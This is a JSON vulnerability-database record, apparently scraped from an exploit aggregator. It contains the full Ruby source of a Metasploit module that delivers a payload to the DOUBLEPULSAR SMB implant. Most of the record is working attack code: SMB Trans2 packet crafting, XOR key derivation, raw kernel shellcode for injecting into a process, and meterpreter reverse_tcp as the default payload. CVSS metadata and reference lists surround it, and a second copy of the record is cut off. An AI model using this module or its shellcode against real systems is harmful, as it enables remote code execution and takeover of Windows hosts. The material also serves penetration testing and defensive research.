["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-02T22:13:12", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-11-02T22:13:12", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-11-03] #"}, "lastseen": "2021-11-02T22:13:12", "differentElements": ["sourceData"], "edition": 64}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "3ca4aa9fd6d108d756212ae8b89dc5b1", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-11-03T22:14:11", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-02T22:13:12", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-11-02T22:13:12", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 